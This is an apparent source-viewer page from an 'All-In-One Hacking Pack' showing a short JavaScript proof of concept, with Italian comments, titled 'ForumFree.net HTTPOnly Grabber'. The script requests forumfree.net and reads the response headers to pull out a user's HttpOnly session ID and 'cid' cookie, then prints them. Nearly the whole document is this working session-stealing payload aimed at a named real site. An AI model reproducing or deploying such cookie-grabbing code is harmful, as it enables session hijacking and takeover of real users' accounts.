Source viewer
Titolo : All-In-One Hacking Pack v1
Proof of concept scrphpbbt per grabbare httponly cookies su forumfree.net

[code linenumbers=false]<scrphpbbt>
/*
ForumFree.net HTTPOnly Grabber PoC
by evilsocket

evilsocket@gmail.com
*/

/* creo un oggetto http e mando una richiesta a forumfree.net */
var req = null;
try { req = new XMLHttpRequest(); } catch ( e ) {}
if (!req) try { req = new ActiveXObject("Msxml2.XMLHTTP"); } catch ( e ) {}
if (!req) try { req = new ActiveXObject("Microsoft.XMLHTTP"); } catch ( e ) {}
req.open('GET', 'http://www.forumfree.net/', false);
req.send(null);

/* qua prendo i cookie httponly */
var resp = req.getAllResponseHeaders();

/* estraggo cid e session id */
var cid = document.cookie.substring(4,document.cookie.indexOf(';'));
var sid = resp.substring( resp.indexOf("session_id") + 11, resp.indexOf(";") );

document.write( 'CID : ' + cid + '<br/>SID : ' + sid );
</scrphpbbt>[/code]ForumFree.net HTTPOnly Grabber PoC